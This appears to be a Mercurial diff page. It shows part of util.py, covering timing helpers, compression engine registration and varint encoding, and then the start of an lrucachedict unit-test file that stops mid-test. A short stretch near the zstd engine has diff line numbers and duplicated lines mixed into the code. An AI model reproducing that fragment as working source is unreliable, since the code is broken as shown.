    On entering, a timedcmstats instance is produced.

    This context manager is reentrant.

    """
    # track nested context managers
    timedcm._nested += 1
    timing_stats = timedcmstats(level=timedcm._nested)
    try:
        with tracing.log(whencefmt, *whenceargs):
            yield timing_stats
    finally:
        timing_stats.elapsed = timer() - timing_stats.start
        timedcm._nested -= 1

timedcm._nested = 0

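# Illustrative usage (not part of the original module):
#
#   with timedcm('loading %s', name) as stats:  # 'name' is a hypothetical arg
#       expensive_work()                        # hypothetical callable
#   print('took %s' % stats)  # stats.elapsed now holds the seconds as a float
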
def timed(func):
    '''Report the execution time of a function call to stderr.

    During development, use as a decorator when you need to measure
    the cost of a function, e.g. as follows:

    @util.timed
    def foo(a, b, c):
        pass
    '''

    def wrapper(*args, **kwargs):
        with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
            result = func(*args, **kwargs)
        stderr = procutil.stderr
        stderr.write('%s%s: %s\n' % (
            ' ' * time_stats.level * 2, pycompat.bytestr(func.__name__),
            time_stats))
        return result
    return wrapper

_sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
              ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))

def sizetoint(s):
    '''Convert a space specifier to a byte count.

    >>> sizetoint(b'30')
    30
    >>> sizetoint(b'2.2kb')
    2252
    >>> sizetoint(b'6M')
    6291456
    '''
    t = s.strip().lower()
    try:
        for k, u in _sizeunits:
            if t.endswith(k):
                return int(float(t[:-len(k)]) * u)
        return int(t)
    except ValueError:
        raise error.ParseError(_("couldn't parse size: %s") % s)

class hooks(object):
    '''A collection of hook functions that can be used to extend a
    function's behavior. Hooks are called in lexicographic order,
    based on the names of their sources.'''

    def __init__(self):
        self._hooks = []

    def add(self, source, hook):
        self._hooks.append((source, hook))

    def __call__(self, *args):
        self._hooks.sort(key=lambda x: x[0])
        results = []
        for source, hook in self._hooks:
            results.append(hook(*args))
        return results

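# Illustrative usage (not part of the original module):
#
#   h = hooks()
#   h.add('zz-late', lambda x: x * 2)
#   h.add('aa-early', lambda x: x + 1)
#   h(3)  # -> [4, 6]; sources sort lexicographically, so 'aa-early' runs first
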
def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
    '''Yields lines for a nicely formatted stacktrace.
    Skips the 'skip' last entries, then returns the last 'depth' entries.
    Each file+linenumber is formatted according to fileline.
    Each line is formatted according to line.
    If line is None, it yields:
      length of longest filepath+line number,
      filepath+linenumber,
      function

    Not to be used in production code but very convenient while developing.
    '''
    entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
               for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
               ][-depth:]
    if entries:
        fnmax = max(len(entry[0]) for entry in entries)
        for fnln, func in entries:
            if line is None:
                yield (fnmax, fnln, func)
            else:
                yield line % (fnmax, fnln, func)

def debugstacktrace(msg='stacktrace', skip=0,
                    f=procutil.stderr, otherf=procutil.stdout, depth=0):
    '''Writes a message to f (stderr) with a nicely formatted stacktrace.
    Skips the 'skip' entries closest to the call, then shows 'depth' entries.
    By default it will flush stdout first.
    It can be used everywhere and intentionally does not require a ui object.
    Not to be used in production code but very convenient while developing.
    '''
    if otherf:
        otherf.flush()
    f.write('%s at:\n' % msg.rstrip())
    for line in getstackframes(skip + 1, depth=depth):
        f.write(line)
    f.flush()

class dirs(object):
    '''a multiset of directory names from a dirstate or manifest'''

    def __init__(self, map, skip=None):
        self._dirs = {}
        addpath = self.addpath
        if safehasattr(map, 'iteritems') and skip is not None:
            for f, s in map.iteritems():
                if s[0] != skip:
                    addpath(f)
        else:
            for f in map:
                addpath(f)

    def addpath(self, path):
        dirs = self._dirs
        for base in finddirs(path):
            if base in dirs:
                dirs[base] += 1
                return
            dirs[base] = 1

    def delpath(self, path):
        dirs = self._dirs
        for base in finddirs(path):
            if dirs[base] > 1:
                dirs[base] -= 1
                return
            del dirs[base]

    def __iter__(self):
        return iter(self._dirs)

    def __contains__(self, d):
        return d in self._dirs

if safehasattr(parsers, 'dirs'):
    dirs = parsers.dirs

def finddirs(path):
    pos = path.rfind('/')
    while pos != -1:
        yield path[:pos]
        pos = path.rfind('/', 0, pos)

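# Illustrative sketch (not part of the original module): finddirs() yields
# ancestor directories from deepest to shallowest, excluding the path itself:
#
#   list(finddirs(b'a/b/c'))  # -> [b'a/b', b'a']
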
# compression code

SERVERROLE = 'server'
CLIENTROLE = 'client'

compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
                                               (u'name', u'serverpriority',
                                                u'clientpriority'))

class compressormanager(object):
    """Holds registrations of various compression engines.

    This class essentially abstracts the differences between compression
    engines to allow new compression formats to be added easily, possibly from
    extensions.

    Compressors are registered against the global instance by calling its
    ``register()`` method.
    """
    def __init__(self):
        self._engines = {}
        # Bundle spec human name to engine name.
        self._bundlenames = {}
        # Internal bundle identifier to engine name.
        self._bundletypes = {}
        # Revlog header to engine name.
        self._revlogheaders = {}
        # Wire proto identifier to engine name.
        self._wiretypes = {}

    def __getitem__(self, key):
        return self._engines[key]

    def __contains__(self, key):
        return key in self._engines

    def __iter__(self):
        return iter(self._engines.keys())

    def register(self, engine):
        """Register a compression engine with the manager.

        The argument must be a ``compressionengine`` instance.
        """
        if not isinstance(engine, compressionengine):
            raise ValueError(_('argument must be a compressionengine'))

        name = engine.name()

        if name in self._engines:
            raise error.Abort(_('compression engine %s already registered') %
                              name)

        bundleinfo = engine.bundletype()
        if bundleinfo:
            bundlename, bundletype = bundleinfo

            if bundlename in self._bundlenames:
                raise error.Abort(_('bundle name %s already registered') %
                                  bundlename)
            if bundletype in self._bundletypes:
                raise error.Abort(_('bundle type %s already registered by %s') %
                                  (bundletype, self._bundletypes[bundletype]))

            # bundlename is empty when no external facing name is declared.
            if bundlename:
                self._bundlenames[bundlename] = name

            self._bundletypes[bundletype] = name

        wiresupport = engine.wireprotosupport()
        if wiresupport:
            wiretype = wiresupport.name
            if wiretype in self._wiretypes:
                raise error.Abort(_('wire protocol compression %s already '
                                    'registered by %s') %
                                  (wiretype, self._wiretypes[wiretype]))

            self._wiretypes[wiretype] = name

        revlogheader = engine.revlogheader()
        if revlogheader and revlogheader in self._revlogheaders:
            raise error.Abort(_('revlog header %s already registered by %s') %
                              (revlogheader, self._revlogheaders[revlogheader]))

        if revlogheader:
            self._revlogheaders[revlogheader] = name

        self._engines[name] = engine

    @property
    def supportedbundlenames(self):
        return set(self._bundlenames.keys())

    @property
    def supportedbundletypes(self):
        return set(self._bundletypes.keys())

    def forbundlename(self, bundlename):
        """Obtain a compression engine registered to a bundle name.

        Will raise KeyError if the bundle type isn't registered.

        Will abort if the engine is known but not available.
        """
        engine = self._engines[self._bundlenames[bundlename]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def forbundletype(self, bundletype):
        """Obtain a compression engine registered to a bundle type.

        Will raise KeyError if the bundle type isn't registered.

        Will abort if the engine is known but not available.
        """
        engine = self._engines[self._bundletypes[bundletype]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def supportedwireengines(self, role, onlyavailable=True):
        """Obtain compression engines that support the wire protocol.

        Returns a list of engines in prioritized order, most desired first.

        If ``onlyavailable`` is set, filter out engines that can't be
        loaded.
        """
        assert role in (SERVERROLE, CLIENTROLE)

        attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'

        engines = [self._engines[e] for e in self._wiretypes.values()]
        if onlyavailable:
            engines = [e for e in engines if e.available()]

        def getkey(e):
            # Sort first by priority, highest first. In case of tie, sort
            # alphabetically. This is arbitrary, but ensures output is
            # stable.
            w = e.wireprotosupport()
            return -1 * getattr(w, attr), w.name

        return list(sorted(engines, key=getkey))

    def forwiretype(self, wiretype):
        engine = self._engines[self._wiretypes[wiretype]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def forrevlogheader(self, header):
        """Obtain a compression engine registered to a revlog header.

        Will raise KeyError if the revlog header value isn't registered.
        """
        return self._engines[self._revlogheaders[header]]

compengines = compressormanager()

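# Illustrative sketch (not part of the original module): registering a
# minimal custom engine with the global manager. Only name() must be
# implemented; the other interface methods are declared by the
# compressionengine base class below.
#
#   class _myengine(compressionengine):
#       def name(self):
#           return 'myengine'
#
#   compengines.register(_myengine())
#   'myengine' in compengines  # -> True
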
class compressionengine(object):
    """Base class for compression engines.

    Compression engines must implement the interface defined by this class.
    """
    def name(self):
        """Returns the name of the compression engine.

        This is the key the engine is registered under.

        This method must be implemented.
        """
        raise NotImplementedError()

    def available(self):
        """Whether the compression engine is available.

        The intent of this method is to allow optional compression engines
        that may not be available in all installations (such as engines relying
        on C extensions that may not be present).
        """
        return True

    def bundletype(self):
        """Describes bundle identifiers for this engine.

        If this compression engine isn't supported for bundles, returns None.

        If this engine can be used for bundles, returns a 2-tuple of strings of
        the user-facing "bundle spec" compression name and an internal
        identifier used to denote the compression format within bundles. To
        exclude the name from external usage, set the first element to ``None``.

        If bundle compression is supported, the class must also implement
        ``compressstream`` and ``decompressorreader``.

        The docstring of this method is used in the help system to tell users
        about this engine.
        """
        return None

    def wireprotosupport(self):
        """Declare support for this compression format on the wire protocol.

        If this compression engine isn't supported for compressing wire
        protocol payloads, returns None.

        Otherwise, returns ``compenginewireprotosupport`` with the following
        fields:

        * String format identifier
        * Integer priority for the server
        * Integer priority for the client

        The integer priorities are used to order the advertisement of format
        support by server and client. The highest integer is advertised
        first. Integers with non-positive values aren't advertised.

        The priority values are somewhat arbitrary and only used for default
        ordering. The relative order can be changed via config options.

        If wire protocol compression is supported, the class must also
        implement ``compressstream`` and ``decompressorreader``.
        """
        return None

    def revlogheader(self):
        """Header added to revlog chunks that identifies this engine.

        If this engine can be used to compress revlogs, this method should
        return the bytes used to identify chunks compressed with this engine.
        Else, the method should return ``None`` to indicate it does not
        participate in revlog compression.
        """
        return None

    def compressstream(self, it, opts=None):
        """Compress an iterator of chunks.

        The method receives an iterator (ideally a generator) of chunks of
        bytes to be compressed. It returns an iterator (ideally a generator)
        of chunks of bytes representing the compressed output.

        Optionally accepts an argument defining how to perform compression.
        Each engine treats this argument differently.
        """
        raise NotImplementedError()

    def decompressorreader(self, fh):
        """Perform decompression on a file object.

        Argument is an object with a ``read(size)`` method that returns
        compressed data. Return value is an object with a ``read(size)``
        method that returns uncompressed data.
        """
        raise NotImplementedError()

    def revlogcompressor(self, opts=None):
        """Obtain an object that can be used to compress revlog entries.

        The object has a ``compress(data)`` method that compresses binary
        data. This method returns compressed binary data or ``None`` if
        the data could not be compressed (too small, not compressible, etc).
        The returned data should have a header uniquely identifying this
        compression format so decompression can be routed to this engine.
        This header should be identified by the ``revlogheader()`` return
        value.

        The object has a ``decompress(data)`` method that decompresses
        data. The method will only be called if ``data`` begins with
        ``revlogheader()``. The method should return the raw, uncompressed
        data or raise a ``RevlogError``.

        The object is reusable but is not thread safe.
        """
        raise NotImplementedError()

class _CompressedStreamReader(object):
    def __init__(self, fh):
        if safehasattr(fh, 'unbufferedread'):
            self._reader = fh.unbufferedread
        else:
            self._reader = fh.read
        self._pending = []
        self._pos = 0
        self._eof = False

    def _decompress(self, chunk):
        raise NotImplementedError()

    def read(self, l):
        buf = []
        while True:
            while self._pending:
                if len(self._pending[0]) > l + self._pos:
                    newbuf = self._pending[0]
                    buf.append(newbuf[self._pos:self._pos + l])
                    self._pos += l
                    return ''.join(buf)

                newbuf = self._pending.pop(0)
                if self._pos:
                    buf.append(newbuf[self._pos:])
                    l -= len(newbuf) - self._pos
                else:
                    buf.append(newbuf)
                    l -= len(newbuf)
                self._pos = 0

            if self._eof:
                return ''.join(buf)
            chunk = self._reader(65536)
            self._decompress(chunk)
            if not chunk and not self._pending and not self._eof:
                # No progress and no new data, bail out
                return ''.join(buf)

class _GzipCompressedStreamReader(_CompressedStreamReader):
    def __init__(self, fh):
        super(_GzipCompressedStreamReader, self).__init__(fh)
        self._decompobj = zlib.decompressobj()
    def _decompress(self, chunk):
        newbuf = self._decompobj.decompress(chunk)
        if newbuf:
            self._pending.append(newbuf)
        d = self._decompobj.copy()
        try:
            d.decompress('x')
            d.flush()
            if d.unused_data == 'x':
                self._eof = True
        except zlib.error:
            pass

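# Illustrative usage (not part of the original module; string literals in
# this module are bytes under its source conventions):
#
#   import io
#   fh = io.BytesIO(zlib.compress(b'payload'))
#   reader = _GzipCompressedStreamReader(fh)
#   reader.read(7)  # -> b'payload'
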
class _BZ2CompressedStreamReader(_CompressedStreamReader):
    def __init__(self, fh):
        super(_BZ2CompressedStreamReader, self).__init__(fh)
        self._decompobj = bz2.BZ2Decompressor()
    def _decompress(self, chunk):
        newbuf = self._decompobj.decompress(chunk)
        if newbuf:
            self._pending.append(newbuf)
        try:
            while True:
                newbuf = self._decompobj.decompress('')
                if newbuf:
                    self._pending.append(newbuf)
                else:
                    break
        except EOFError:
            self._eof = True

class _TruncatedBZ2CompressedStreamReader(_BZ2CompressedStreamReader):
    def __init__(self, fh):
        super(_TruncatedBZ2CompressedStreamReader, self).__init__(fh)
        newbuf = self._decompobj.decompress('BZ')
        if newbuf:
            self._pending.append(newbuf)

class _ZstdCompressedStreamReader(_CompressedStreamReader):
    def __init__(self, fh, zstd):
        super(_ZstdCompressedStreamReader, self).__init__(fh)
        self._zstd = zstd
        self._decompobj = zstd.ZstdDecompressor().decompressobj()
    def _decompress(self, chunk):
        newbuf = self._decompobj.decompress(chunk)
        if newbuf:
            self._pending.append(newbuf)
        try:
            while True:
                newbuf = self._decompobj.decompress('')
                if newbuf:
                    self._pending.append(newbuf)
                else:
                    break
        except self._zstd.ZstdError:
            self._eof = True

class _zlibengine(compressionengine):
    def name(self):
        return 'zlib'

    def bundletype(self):
        """zlib compression using the DEFLATE algorithm.

        All Mercurial clients should support this format. The compression
        algorithm strikes a reasonable balance between compression ratio
        and speed.
        """
        return 'gzip', 'GZ'

    def wireprotosupport(self):
        return compewireprotosupport('zlib', 20, 20)

    def revlogheader(self):
        return 'x'

    def compressstream(self, it, opts=None):
        opts = opts or {}

        z = zlib.compressobj(opts.get('level', -1))
        for chunk in it:
            data = z.compress(chunk)
            # Not all calls to compress emit data. It is cheaper to inspect
            # here than to feed empty chunks through generator.
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        return _GzipCompressedStreamReader(fh)

    class zlibrevlogcompressor(object):
        def compress(self, data):
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            if insize < 44:
                return None

            elif insize <= 1000000:
                compressed = zlib.compress(data)
                if len(compressed) < insize:
                    return compressed
                return None

            # zlib makes an internal copy of the input buffer, doubling
            # memory usage for large inputs. So do streaming compression
            # on large inputs.
            else:
                z = zlib.compressobj()
                parts = []
                pos = 0
                while pos < insize:
                    pos2 = pos + 2**20
                    parts.append(z.compress(data[pos:pos2]))
                    pos = pos2
                parts.append(z.flush())

                if sum(map(len, parts)) < insize:
                    return ''.join(parts)
                return None

        def decompress(self, data):
            try:
                return zlib.decompress(data)
            except zlib.error as e:
                raise error.RevlogError(_('revlog decompress error: %s') %
                                        stringutil.forcebytestr(e))

    def revlogcompressor(self, opts=None):
        return self.zlibrevlogcompressor()

compengines.register(_zlibengine())

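# Illustrative usage (not part of the original module): round-tripping a
# stream through the registered zlib engine.
#
#   chunks = [b'some ', b'data']
#   out = b''.join(compengines['zlib'].compressstream(iter(chunks)))
#   zlib.decompress(out)  # -> b'some data'
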
class _bz2engine(compressionengine):
    def name(self):
        return 'bz2'

    def bundletype(self):
        """An algorithm that produces smaller bundles than ``gzip``.

        All Mercurial clients should support this format.

        This engine will likely produce smaller bundles than ``gzip`` but
        will be significantly slower, both during compression and
        decompression.

        If available, the ``zstd`` engine can yield similar or better
        compression at much higher speeds.
        """
        return 'bzip2', 'BZ'

    # We declare a protocol name but don't advertise by default because
    # it is slow.
    def wireprotosupport(self):
        return compewireprotosupport('bzip2', 0, 0)

    def compressstream(self, it, opts=None):
        opts = opts or {}
        z = bz2.BZ2Compressor(opts.get('level', 9))
        for chunk in it:
            data = z.compress(chunk)
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        return _BZ2CompressedStreamReader(fh)

compengines.register(_bz2engine())

class _truncatedbz2engine(compressionengine):
    def name(self):
        return 'bz2truncated'

    def bundletype(self):
        return None, '_truncatedBZ'

    # We don't implement compressstream because it is hackily handled elsewhere.

    def decompressorreader(self, fh):
        return _TruncatedBZ2CompressedStreamReader(fh)

compengines.register(_truncatedbz2engine())

class _noopengine(compressionengine):
    def name(self):
        return 'none'

    def bundletype(self):
        """No compression is performed.

        Use this compression engine to explicitly disable compression.
        """
        return 'none', 'UN'

    # Clients always support uncompressed payloads. Servers don't because
    # unless you are on a fast network, uncompressed payloads can easily
    # saturate your network pipe.
    def wireprotosupport(self):
        return compewireprotosupport('none', 0, 10)

    # We don't implement revlogheader because it is handled specially
    # in the revlog class.

    def compressstream(self, it, opts=None):
        return it

    def decompressorreader(self, fh):
        return fh

    class nooprevlogcompressor(object):
        def compress(self, data):
            return None

    def revlogcompressor(self, opts=None):
        return self.nooprevlogcompressor()

compengines.register(_noopengine())

3714 class _zstdengine(compressionengine):
3724 class _zstdengine(compressionengine):
3715 def name(self):
3725 def name(self):
3716 return 'zstd'
3726 return 'zstd'
3717
3727
3718 @propertycache
3728 @propertycache
3719 def _module(self):
3729 def _module(self):
3720 # Not all installs have the zstd module available. So defer importing
3730 # Not all installs have the zstd module available. So defer importing
3721 # until first access.
3731 # until first access.
3722 try:
3732 try:
3723 from . import zstd
3733 from . import zstd
3724 # Force delayed import.
3734 # Force delayed import.
3725 zstd.__version__
3735 zstd.__version__
3726 return zstd
3736 return zstd
3727 except ImportError:
3737 except ImportError:
        return None

    def available(self):
        return bool(self._module)

    def bundletype(self):
        """A modern compression algorithm that is fast and highly flexible.

        Only supported by Mercurial 4.1 and newer clients.

        With the default settings, zstd compression is both faster and yields
        better compression than ``gzip``. It also frequently yields better
        compression than ``bzip2`` while operating at much higher speeds.

        If this engine is available and backwards compatibility is not a
        concern, it is likely the best available engine.
        """
        return 'zstd', 'ZS'

    def wireprotosupport(self):
        return compewireprotosupport('zstd', 50, 50)

    def revlogheader(self):
        return '\x28'

    def compressstream(self, it, opts=None):
        opts = opts or {}
        # zstd level 3 is almost always significantly faster than zlib
        # while providing no worse compression. It strikes a good balance
        # between speed and compression.
        level = opts.get('level', 3)

        zstd = self._module
        z = zstd.ZstdCompressor(level=level).compressobj()
        for chunk in it:
            data = z.compress(chunk)
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        return _ZstdCompressedStreamReader(fh, self._module)

    class zstdrevlogcompressor(object):
        def __init__(self, zstd, level=3):
            # TODO consider omitting frame magic to save 4 bytes.
            # This writes content sizes into the frame header. That is
            # extra storage. But it allows a correct size memory allocation
            # to hold the result.
            self._cctx = zstd.ZstdCompressor(level=level)
            self._dctx = zstd.ZstdDecompressor()
            self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
            self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE

        def compress(self, data):
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            if insize < 50:
                return None

            elif insize <= 1000000:
                compressed = self._cctx.compress(data)
                if len(compressed) < insize:
                    return compressed
                return None
            else:
                z = self._cctx.compressobj()
                chunks = []
                pos = 0
                while pos < insize:
                    pos2 = pos + self._compinsize
                    chunk = z.compress(data[pos:pos2])
                    if chunk:
                        chunks.append(chunk)
                    pos = pos2
                chunks.append(z.flush())

                if sum(map(len, chunks)) < insize:
                    return ''.join(chunks)
                return None

        def decompress(self, data):
            insize = len(data)

            try:
                # This was measured to be faster than other streaming
                # decompressors.
                dobj = self._dctx.decompressobj()
                chunks = []
                pos = 0
                while pos < insize:
                    pos2 = pos + self._decompinsize
                    chunk = dobj.decompress(data[pos:pos2])
                    if chunk:
                        chunks.append(chunk)
                    pos = pos2
                # Frame should be exhausted, so no finish() API.

                return ''.join(chunks)
            except Exception as e:
                raise error.RevlogError(_('revlog decompress error: %s') %
                                        stringutil.forcebytestr(e))

    def revlogcompressor(self, opts=None):
        opts = opts or {}
        return self.zstdrevlogcompressor(self._module,
                                         level=opts.get('level', 3))

compengines.register(_zstdengine())

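The streaming pattern in compressstream() above can be exercised directly against the standalone python-zstandard package. A minimal sketch follows; the ``zstandard`` import name refers to the PyPI package rather than Mercurial's vendored module, and is the only assumption here:

import zstandard

def compress_chunks(chunks, level=3):
    # Mirror compressstream(): push chunks through a compressobj,
    # yield only non-empty output, and flush once at the end.
    z = zstandard.ZstdCompressor(level=level).compressobj()
    for chunk in chunks:
        data = z.compress(chunk)
        if data:
            yield data
    yield z.flush()

payload = b'hello ' * 1000
compressed = b''.join(compress_chunks([payload]))
# decompressobj() handles frames without an embedded content size,
# which is why the revlog decompressor above uses the same API.
assert zstandard.ZstdDecompressor().decompressobj().decompress(compressed) == payload
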
def bundlecompressiontopics():
    """Obtains a list of available bundle compressions for use in help."""
    # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
    items = {}

    # We need to format the docstring. So use a dummy object/type to hold it
    # rather than mutating the original.
    class docobject(object):
        pass

    for name in compengines:
        engine = compengines[name]

        if not engine.available():
            continue

        bt = engine.bundletype()
        if not bt or not bt[0]:
            continue

        doc = pycompat.sysstr('``%s``\n    %s') % (
            bt[0], engine.bundletype.__doc__)

        value = docobject()
        value.__doc__ = doc
        value._origdoc = engine.bundletype.__doc__
        value._origfunc = engine.bundletype

        items[bt[0]] = value

    return items

i18nfunctions = bundlecompressiontopics().values()

# convenient shortcut
dst = debugstacktrace

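bundlecompressiontopics() reuses each engine's bundletype() docstring as its help text, prefixed with the bundle spec name. An illustrative call, with the expected shape of the output sketched in comments (the exact text comes from the docstrings above):

items = bundlecompressiontopics()
print(items['zstd'].__doc__)
# ``zstd``
#     A modern compression algorithm that is fast and highly flexible.
# ... (remainder of the bundletype() docstring follows)
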
def safename(f, tag, ctx, others=None):
    """
    Generate a name that is safe to rename f to in the given context.

    f: filename to rename
    tag: a string tag that will be included in the new name
    ctx: a context, in which the new name must not exist
    others: a set of other filenames that the new name must not be in

    Returns a file name of the form oldname~tag[~number] which does not exist
    in the provided context and is not in the set of other names.
    """
    if others is None:
        others = set()

    fn = '%s~%s' % (f, tag)
    if fn not in ctx and fn not in others:
        return fn
    for n in itertools.count(1):
        fn = '%s~%s~%s' % (f, tag, n)
        if fn not in ctx and fn not in others:
            return fn

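Since safename() only performs ``in`` membership tests on ctx and others, a plain set can stand in for the changectx in a quick illustration (a sketch, not how Mercurial actually calls it):

taken = {'foo~other'}  # stands in for the context's membership checks
assert safename('foo', 'other', taken) == 'foo~other~1'  # base name taken
assert safename('bar', 'other', taken) == 'bar~other'    # base name free
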
def readexactly(stream, n):
    '''read n bytes from stream.read and abort if less was available'''
    s = stream.read(n)
    if len(s) < n:
        raise error.Abort(_("stream ended unexpectedly"
                            " (got %d bytes, expected %d)")
                          % (len(s), n))
    return s

def uvarintencode(value):
    """Encode an unsigned integer value to a varint.

    A varint is a variable length integer of 1 or more bytes. Each byte
    except the last has the most significant bit set. The lower 7 bits of
    each byte store the integer's binary representation, least significant
    group first.

    >>> uvarintencode(0)
    '\\x00'
    >>> uvarintencode(1)
    '\\x01'
    >>> uvarintencode(127)
    '\\x7f'
    >>> uvarintencode(1337)
    '\\xb9\\n'
    >>> uvarintencode(65536)
    '\\x80\\x80\\x04'
    >>> uvarintencode(-1)
    Traceback (most recent call last):
        ...
    ProgrammingError: negative value for uvarint: -1
    """
    if value < 0:
        raise error.ProgrammingError('negative value for uvarint: %d'
                                     % value)
    bits = value & 0x7f
    value >>= 7
    bytes = []
    while value:
        bytes.append(pycompat.bytechr(0x80 | bits))
        bits = value & 0x7f
        value >>= 7
    bytes.append(pycompat.bytechr(bits))

    return ''.join(bytes)

def uvarintdecodestream(fh):
    """Decode an unsigned variable length integer from a stream.

    The passed argument is anything that has a ``.read(N)`` method.

    >>> try:
    ...     from StringIO import StringIO as BytesIO
    ... except ImportError:
    ...     from io import BytesIO
    >>> uvarintdecodestream(BytesIO(b'\\x00'))
    0
    >>> uvarintdecodestream(BytesIO(b'\\x01'))
    1
    >>> uvarintdecodestream(BytesIO(b'\\x7f'))
    127
    >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
    1337
    >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
    65536
    >>> uvarintdecodestream(BytesIO(b'\\x80'))
    Traceback (most recent call last):
        ...
    Abort: stream ended unexpectedly (got 0 bytes, expected 1)
    """
    result = 0
    shift = 0
    while True:
        byte = ord(readexactly(fh, 1))
        result |= ((byte & 0x7f) << shift)
        if not (byte & 0x80):
            return result
        shift += 7
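
As a worked example of the format (using Python 3 byte semantics): 1337 is 0b10100111001; the low 7-bit group 0b0111001 (0x39) is emitted first with the continuation bit set (0x80 | 0x39 = 0xb9), and the remaining bits 0b1010 (0x0a) form the final byte, matching the '\\xb9\\n' doctest above:

from io import BytesIO

assert uvarintencode(1337) == b'\xb9\x0a'              # 0x0a renders as '\n'
assert uvarintdecodestream(BytesIO(b'\xb9\x0a')) == 1337

# The round trip holds for any non-negative integer:
for v in (0, 1, 127, 128, 16383, 16384, 65536):
    assert uvarintdecodestream(BytesIO(uvarintencode(v))) == v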
@@ -1,325 +1,325 b''
from __future__ import absolute_import, print_function

import unittest

import silenttestrunner

from mercurial import (
    util,
)

class testlrucachedict(unittest.TestCase):
    def testsimple(self):
        d = util.lrucachedict(4)
        self.assertEqual(d.capacity, 4)
        d.insert('a', 'va', cost=2)
        d['b'] = 'vb'
        d['c'] = 'vc'
        d.insert('d', 'vd', cost=42)

        self.assertEqual(d['a'], 'va')
        self.assertEqual(d['b'], 'vb')
        self.assertEqual(d['c'], 'vc')
        self.assertEqual(d['d'], 'vd')

        self.assertEqual(d.totalcost, 44)

        # 'a' should be dropped because it was least recently used.
        d['e'] = 've'
        self.assertNotIn('a', d)
        self.assertIsNone(d.get('a'))
        self.assertEqual(d.totalcost, 42)

        self.assertEqual(d['b'], 'vb')
        self.assertEqual(d['c'], 'vc')
        self.assertEqual(d['d'], 'vd')
        self.assertEqual(d['e'], 've')

        # Replacing item with different cost adjusts totalcost.
        d.insert('e', 've', cost=4)
        self.assertEqual(d.totalcost, 46)

        # Touch entries in some order (both get and set).
        d['e']
        d['c'] = 'vc2'
        d['d']
        d['b'] = 'vb2'

        # 'e' should be dropped now
        d['f'] = 'vf'
        self.assertNotIn('e', d)
        self.assertEqual(d['b'], 'vb2')
        self.assertEqual(d['c'], 'vc2')
        self.assertEqual(d['d'], 'vd')
        self.assertEqual(d['f'], 'vf')

        d.clear()
        for key in ('a', 'b', 'c', 'd', 'e', 'f'):
            self.assertNotIn(key, d)

    def testunfull(self):
        d = util.lrucachedict(4)
        d['a'] = 1
        d['b'] = 2
        d['a']
        d['b']

        for key in ('a', 'b'):
            self.assertIn(key, d)

    def testcopypartial(self):
        d = util.lrucachedict(4)
        d.insert('a', 'va', cost=4)
        d.insert('b', 'vb', cost=2)

        dc = d.copy()

        self.assertEqual(len(dc), 2)
        self.assertEqual(dc.totalcost, 6)
        for key in ('a', 'b'):
            self.assertIn(key, dc)
            self.assertEqual(dc[key], 'v%s' % key)

        self.assertEqual(len(d), 2)
        for key in ('a', 'b'):
            self.assertIn(key, d)
            self.assertEqual(d[key], 'v%s' % key)

        d['c'] = 'vc'
        del d['b']
        self.assertEqual(d.totalcost, 4)
        dc = d.copy()
        self.assertEqual(len(dc), 2)
        self.assertEqual(dc.totalcost, 4)
        for key in ('a', 'c'):
            self.assertIn(key, dc)
            self.assertEqual(dc[key], 'v%s' % key)

    def testcopyempty(self):
        d = util.lrucachedict(4)
        dc = d.copy()
        self.assertEqual(len(dc), 0)

    def testcopyfull(self):
        d = util.lrucachedict(4)
        d.insert('a', 'va', cost=42)
        d['b'] = 'vb'
        d['c'] = 'vc'
        d['d'] = 'vd'

        dc = d.copy()

        for key in ('a', 'b', 'c', 'd'):
            self.assertIn(key, dc)
            self.assertEqual(dc[key], 'v%s' % key)

        self.assertEqual(d.totalcost, 42)
        self.assertEqual(dc.totalcost, 42)

        # 'a' should be dropped because it was least recently used.
        dc['e'] = 've'
        self.assertNotIn('a', dc)
        for key in ('b', 'c', 'd', 'e'):
            self.assertIn(key, dc)
            self.assertEqual(dc[key], 'v%s' % key)

        self.assertEqual(d.totalcost, 42)
        self.assertEqual(dc.totalcost, 0)

        # Contents and order of original dict should remain unchanged.
        dc['b'] = 'vb_new'

        self.assertEqual(list(iter(d)), ['d', 'c', 'b', 'a'])
        for key in ('a', 'b', 'c', 'd'):
            self.assertEqual(d[key], 'v%s' % key)

        d = util.lrucachedict(4, maxcost=42)
        d.insert('a', 'va', cost=5)
        d.insert('b', 'vb', cost=4)
        d.insert('c', 'vc', cost=3)
        dc = d.copy()
        self.assertEqual(dc.maxcost, 42)
        self.assertEqual(len(dc), 3)

        # Max cost can be lowered as part of copy.
        dc = d.copy(maxcost=10)
        self.assertEqual(dc.maxcost, 10)
        self.assertEqual(len(dc), 2)
        self.assertEqual(dc.totalcost, 7)
        self.assertIn('b', dc)
        self.assertIn('c', dc)

    def testcopydecreasecapacity(self):
        d = util.lrucachedict(5)
        d.insert('a', 'va', cost=4)
        d.insert('b', 'vb', cost=2)
        d['c'] = 'vc'
        d['d'] = 'vd'

        dc = d.copy(2)
        self.assertEqual(dc.totalcost, 0)
        for key in ('a', 'b'):
            self.assertNotIn(key, dc)
        for key in ('c', 'd'):
            self.assertIn(key, dc)
            self.assertEqual(dc[key], 'v%s' % key)

        dc.insert('e', 've', cost=7)
        self.assertEqual(dc.totalcost, 7)
        self.assertNotIn('c', dc)
        for key in ('d', 'e'):
